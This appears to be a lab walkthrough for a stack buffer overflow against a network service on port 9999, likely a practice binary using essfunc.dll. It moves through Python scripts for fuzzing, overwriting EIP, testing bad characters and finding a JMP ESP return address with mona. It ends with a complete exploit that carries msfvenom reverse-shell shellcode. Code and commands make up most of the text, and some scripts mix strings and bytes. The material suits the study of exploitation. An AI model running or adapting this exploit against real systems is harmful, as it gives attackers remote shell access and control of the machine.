Fuzzing: Check if we can overlow the buffer
Copy import socket
import sys
username = "pika"
message = "A" * 4000
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.101',9999))
# s.recv(1024)
# s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit() Use msf-pattern_create to overflow the buffer again. Replace the value of "A" with this.
Copy msf-pattern_create -l 5000 Check the value in EIP register. Then use msf-patten_offset to check the position of overflow
Copy msf-pattern_offset -l 5000 -q 35724134 Now use this offset value and try to overwrite the EIP with "B"
Copy import socket
import sys
username = "pika"
message = "A" * 2012 + "B" * 4
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit() Check if the EIP is overwritten with 42424242. Now find badchars. \x00 is bad by default
Copy import socket
import sys
username = "pika"
message = "A" * 2012 + "B" * 4
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + badchars + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit() Right Click on ESP and click Follow In Dump. Check the badchars there. Next step is to rerun Immunity and start the service. Go to the bottom and type
This will give you a list of information. Check the module which has FALSE across the board. Then do another search.
Copy !mona find -s "\xff\xe4" -m essfunc.dll Check the Results section and note down the return address. Run the service and click on blue arrow. Enter the return address there. It will take you to the location of that address. Click F2 to set a breakpoint. Then run the following script. (Return Address= 625014DF)
Copy import socket
import sys
username = "pika"
message = "A" * 2012 + "\xdf\x14\x50\x62"
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit() Check if we have overwritten the EIP with the return address. Also check at the buttom if it says Breakpoint at essfunc.625014DF. Then create a msfvenom payload to get a shell. Remember to add any badchars found in the payload to remove them:
Copy msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\x00" -f c Now run the following script to get a shell
Copy import socket
import sys
username = b"pika"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xbf\x6f\x90\x2c\xf7\xda\xdd\xd9\x74\x24\xf4\x5d\x33\xc9\xb1"
b"\x52\x31\x7d\x12\x03\x7d\x12\x83\x82\x6c\xce\x02\xa0\x65\x8d"
b"\xed\x58\x76\xf2\x64\xbd\x47\x32\x12\xb6\xf8\x82\x50\x9a\xf4"
b"\x69\x34\x0e\x8e\x1c\x91\x21\x27\xaa\xc7\x0c\xb8\x87\x34\x0f"
b"\x3a\xda\x68\xef\x03\x15\x7d\xee\x44\x48\x8c\xa2\x1d\x06\x23"
b"\x52\x29\x52\xf8\xd9\x61\x72\x78\x3e\x31\x75\xa9\x91\x49\x2c"
b"\x69\x10\x9d\x44\x20\x0a\xc2\x61\xfa\xa1\x30\x1d\xfd\x63\x09"
b"\xde\x52\x4a\xa5\x2d\xaa\x8b\x02\xce\xd9\xe5\x70\x73\xda\x32"
b"\x0a\xaf\x6f\xa0\xac\x24\xd7\x0c\x4c\xe8\x8e\xc7\x42\x45\xc4"
b"\x8f\x46\x58\x09\xa4\x73\xd1\xac\x6a\xf2\xa1\x8a\xae\x5e\x71"
b"\xb2\xf7\x3a\xd4\xcb\xe7\xe4\x89\x69\x6c\x08\xdd\x03\x2f\x45"
b"\x12\x2e\xcf\x95\x3c\x39\xbc\xa7\xe3\x91\x2a\x84\x6c\x3c\xad"
b"\xeb\x46\xf8\x21\x12\x69\xf9\x68\xd1\x3d\xa9\x02\xf0\x3d\x22"
b"\xd2\xfd\xeb\xe5\x82\x51\x44\x46\x72\x12\x34\x2e\x98\x9d\x6b"
b"\x4e\xa3\x77\x04\xe5\x5e\x10\xeb\x52\x60\x85\x83\xa0\x60\x5b"
b"\x35\x2c\x86\x09\xa5\x78\x11\xa6\x5c\x21\xe9\x57\xa0\xff\x94"
b"\x58\x2a\x0c\x69\x16\xdb\x79\x79\xcf\x2b\x34\x23\x46\x33\xe2"
b"\x4b\x04\xa6\x69\x8b\x43\xdb\x25\xdc\x04\x2d\x3c\x88\xb8\x14"
b"\x96\xae\x40\xc0\xd1\x6a\x9f\x31\xdf\x73\x52\x0d\xfb\x63\xaa"
b"\x8e\x47\xd7\x62\xd9\x11\x81\xc4\xb3\xd3\x7b\x9f\x68\xba\xeb"
b"\x66\x43\x7d\x6d\x67\x8e\x0b\x91\xd6\x67\x4a\xae\xd7\xef\x5a"
b"\xd7\x05\x90\xa5\x02\x8e\xa0\xef\x0e\xa7\x28\xb6\xdb\xf5\x34"
b"\x49\x36\x39\x41\xca\xb2\xc2\xb6\xd2\xb7\xc7\xf3\x54\x24\xba"
b"\x6c\x31\x4a\x69\x8c\x10")
try:
print("sending payload...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.105',9999))
#s.recv(1024)
#s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect")
sys.exit() 